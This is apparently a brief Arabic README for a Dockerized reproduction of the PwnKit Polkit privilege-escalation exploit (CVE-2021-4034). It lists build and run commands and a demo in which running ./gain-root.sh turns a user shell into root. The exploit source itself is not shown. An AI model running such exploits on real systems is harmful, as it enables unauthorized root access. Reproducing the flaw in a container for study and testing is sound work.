
# استغلال Polkit في حاوية Docker (CVE-2021-4034) استغلال مُحوسب داخل حاوية Docker لتصعيد الامتيازات في Polkit (CVE-2021-4034) يمنح وصول الجذر عبر pkexec، مع سكربت بسيط للتشغيل والتحقق.
استغلال رفع الامتيازات في Polkit. تمت حوسبته عبر Docker من أجل قابلية إعادة الإنتاج.
docker build -t cve20214034 .
docker run -it --rm cve20214034
whoami # user
./gain-root.sh
whoami # root